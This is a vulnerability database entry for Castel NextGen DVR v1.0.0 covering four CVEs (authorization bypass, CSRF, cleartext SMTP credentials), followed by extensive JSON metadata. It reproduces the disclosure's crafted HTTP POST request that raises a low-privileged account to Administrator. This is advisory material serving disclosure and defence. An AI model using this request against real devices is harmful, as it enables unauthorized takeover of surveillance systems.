VAR-202006-0042

Vulnerability from variot - Updated: 2023-12-18 12:27

Castel NextGen DVR v1.0.0 is vulnerable to privilege escalation through the Adminstrator/Users/Edit/:UserId functionality. Adminstrator/Users/Edit/:UserId fails to check that the request was submitted by an Administrator. This allows a normal user to escalate their privileges by adding additional roles to their account. Castel NextGen DVR Exists in a privilege management vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state.

The Castel NextGen DVR management function has security vulnerabilities, allowing remote attackers to use the vulnerabilities to submit special requests, elevate permissions, and obtain administrator permissions. All issues are associated with Castel NextGen DVR v1.0.0 and have been resolved in v1.0.1.


CVE-2020-11679 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11679

Original Disclosure https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass

Description A low privileged user can call functionality reserved for an Administrator which promotes a low privileged account to the Administrator role:

POST /Administration/Users/Edit/:ID HTTP/1.1

Host: $RHOST User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: $REVIEWER_COOKIES DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 349

UserId=:ID&Email=bypass%40test.com &FirstName=bypass&LastName=bypass&LDAPUser=false

&Roles%5B0%5D.RoleId=1&Roles%5B0%5D.IsSelected=true&Roles%5B0%5D.IsSelected=false

&Roles%5B1%5D.RoleId=3&Roles%5B1%5D.IsSelected=true&Roles%5B1%5D.IsSelected=false

&Roles%5B2%5D.RoleId=5&Roles%5B2%5D.IsSelected=true&Roles%5B2%5D.IsSelected=false &Locked=false


CVE-2020-11680 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11680

Original Disclosure https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass

Description The application does not perform an authorization check before functionality is performed. Low privileged users are prevented from browsing to pages that perform Administrator functionality using GET, however, functionality can be performed by directly crafting the associated POST request. This can be exploited to modify user accounts, modify the application, etc. Combined with the reported CSRF, CVE-2020-11682, any user of the application can be used to grant Administrator access to a malicious user.


CVE-2020-11681 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11681

Original Disclosure https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass

Description Credentials are returned in cleartext in the source of the SMTP page. If a malicious user compromises an account. or exploits the CSRF to gain access to the application, the associated SMTP server/account could also be compromised.


CVE-2020-11682 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11682

Original Disclosure https://www.securitymetrics.com/blog/where-did-request-come-from-cross-site-request-forgery-csrf

Description The application does not properly prevent CSRF; the __RequestVerificationToken, which is included with state changing requests, is not verified by the application - requests are successful even when the token is removed.

AARON BISHOP | Principal Penetration Tester CISSP, OSCP, OSWE [image: SecurityMetrics]

Show details on source website

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202006-0042",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "nextgen dvr",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "castel",
        "version": "1.0.0"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-24898"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-006190"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-11679"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:castel:nextgen_dvr_firmware:1.0.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:castel:nextgen_dvr:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-11679"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Aaron Bishop",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "157954"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-501"
      }
    ],
    "trust": 0.7
  },
  "cve": "CVE-2020-11679",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.0,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "Single",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 6.5,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-006190",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.0,
            "id": "CNVD-2021-24898",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "VULMON",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.0,
            "id": "CVE-2020-11679",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "MEDIUM",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 8.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-006190",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2020-11679",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "JVNDB-2020-006190",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2021-24898",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202006-501",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2020-11679",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-24898"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-11679"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-006190"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-11679"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-501"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Castel NextGen DVR v1.0.0 is vulnerable to privilege escalation through the Adminstrator/Users/Edit/:UserId functionality. Adminstrator/Users/Edit/:UserId fails to check that the request was submitted by an Administrator. This allows a normal user to escalate their privileges by adding additional roles to their account. Castel NextGen DVR Exists in a privilege management vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. \n\r\n\r\nThe Castel NextGen DVR management function has security vulnerabilities, allowing remote attackers to use the vulnerabilities to submit special requests, elevate permissions, and obtain administrator permissions. All issues are associated with *Castel NextGen DVR v1.0.0 *and have been\nresolved in v1.0.1*.*\n\n-------------------------------\n*CVE-2020-11679\n\u003chttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11679\u003e*\n\n\n*Original Disclosure*\nhttps://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass\n\n*Description*\nA low privileged user can call functionality reserved for an Administrator\nwhich promotes a low privileged account to the Administrator role:\n\nPOST /Administration/Users/Edit/:ID HTTP/1.1\n\u003e Host: $RHOST\n\u003e User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101\n\u003e Firefox/52.0\n\u003e Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n\u003e Accept-Language: en-US,en;q=0.5\n\u003e Accept-Encoding: gzip, deflate\n\u003e Cookie: $REVIEWER_COOKIES\n\u003e DNT: 1\n\u003e Connection: close\n\u003e Upgrade-Insecure-Requests: 1\n\u003e Content-Type: application/x-www-form-urlencoded\n\u003e Content-Length: 349\n\n\n\u003e UserId=:ID\u0026Email=bypass%40test.com\n\u003e \u0026FirstName=bypass\u0026LastName=bypass\u0026LDAPUser=false\n\u003e\n\u003e \u0026Roles%5B0%5D.RoleId=1\u0026Roles%5B0%5D.IsSelected=true\u0026Roles%5B0%5D.IsSelected=false\n\u003e\n\u003e \u0026Roles%5B1%5D.RoleId=3\u0026Roles%5B1%5D.IsSelected=true\u0026Roles%5B1%5D.IsSelected=false\n\u003e\n\u003e \u0026Roles%5B2%5D.RoleId=5\u0026Roles%5B2%5D.IsSelected=true\u0026Roles%5B2%5D.IsSelected=false\n\u003e \u0026Locked=false\n\n-------------------------------\n*CVE-2020-11680\n\u003chttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11680\u003e*\n\n*Original Disclosure*\nhttps://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass\n\n*Description*\nThe application does not perform an authorization check before\nfunctionality is performed.  Low privileged users are prevented from\nbrowsing to pages that perform Administrator functionality using GET,\nhowever, functionality can be performed by directly crafting the associated\nPOST request.   This can be exploited to modify user accounts, modify the\napplication, etc.  Combined with the reported CSRF, CVE-2020-11682, any\nuser of the application can be used to grant Administrator access to a\nmalicious user. \n-------------------------------\n*CVE-2020-11681\n\u003chttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11681\u003e*\n\n*Original Disclosure*\nhttps://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass\n\n*Description*\nCredentials are returned in cleartext in the source of the SMTP page.  If a\nmalicious user compromises an account. or exploits the CSRF to gain access\nto the application,  the associated SMTP server/account could also be\ncompromised. \n-------------------------------\n*CVE-2020-11682\n\u003chttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11682\u003e*\n\n*Original Disclosure*\nhttps://www.securitymetrics.com/blog/where-did-request-come-from-cross-site-request-forgery-csrf\n\n*Description*\nThe application does not properly prevent CSRF; the\n__RequestVerificationToken, which is included with state changing requests,\nis not verified by the application - requests are successful even when the\ntoken is removed. \n\nAARON BISHOP | Principal Penetration Tester CISSP, OSCP, OSWE [image:\nSecurityMetrics]\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-11679"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-006190"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-24898"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-11679"
      },
      {
        "db": "PACKETSTORM",
        "id": "157954"
      }
    ],
    "trust": 2.34
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-11679",
        "trust": 3.2
      },
      {
        "db": "PACKETSTORM",
        "id": "157954",
        "trust": 3.2
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-006190",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-24898",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-501",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-11679",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-24898"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-11679"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-006190"
      },
      {
        "db": "PACKETSTORM",
        "id": "157954"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-11679"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-501"
      }
    ]
  },
  "id": "VAR-202006-0042",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-24898"
      }
    ],
    "trust": 1.2666667
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-24898"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:27:28.739000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Digital Video Recorder (DVR)",
        "trust": 0.8,
        "url": "http://castle-cctv.kr/digital-video-recorder-dvr/"
      },
      {
        "title": "Patch for Castel NextGen DVR management function privilege escalation vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/255911"
      },
      {
        "title": "Castel NextGen DVR Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=121159"
      },
      {
        "title": "CVEs",
        "trust": 0.1,
        "url": "https://github.com/irbishop/cves "
      },
      {
        "title": "CVEs",
        "trust": 0.1,
        "url": "https://github.com/irbishop/cve "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-24898"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-11679"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-006190"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-501"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-862",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-269",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-006190"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-11679"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.7,
        "url": "http://packetstormsecurity.com/files/157954/castel-nextgen-dvr-1.0.0-bypass-csrf-disclosure.html"
      },
      {
        "trust": 1.8,
        "url": "https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass"
      },
      {
        "trust": 1.8,
        "url": "http://seclists.org/fulldisclosure/2020/jun/8"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-11679"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11679"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/862.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/irbishop/cves"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-11680"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11679\u003e*"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11681\u003e*"
      },
      {
        "trust": 0.1,
        "url": "https://www.securitymetrics.com/blog/where-did-request-come-from-cross-site-request-forgery-csrf"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-11681"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11680\u003e*"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-11682"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11682\u003e*"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-24898"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-11679"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-006190"
      },
      {
        "db": "PACKETSTORM",
        "id": "157954"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-11679"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-501"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-24898"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-11679"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-006190"
      },
      {
        "db": "PACKETSTORM",
        "id": "157954"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-11679"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-501"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-04-04T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2021-24898"
      },
      {
        "date": "2020-06-04T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-11679"
      },
      {
        "date": "2020-07-02T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-006190"
      },
      {
        "date": "2020-06-05T18:19:24",
        "db": "PACKETSTORM",
        "id": "157954"
      },
      {
        "date": "2020-06-04T19:15:12.693000",
        "db": "NVD",
        "id": "CVE-2020-11679"
      },
      {
        "date": "2020-06-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202006-501"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-04-06T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2021-24898"
      },
      {
        "date": "2021-07-21T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-11679"
      },
      {
        "date": "2020-07-02T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-006190"
      },
      {
        "date": "2021-07-21T11:39:23.747000",
        "db": "NVD",
        "id": "CVE-2020-11679"
      },
      {
        "date": "2021-01-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202006-501"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-501"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Castel NextGen DVR Vulnerability related to authority management in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-006190"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-501"
      }
    ],
    "trust": 0.6
  }
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…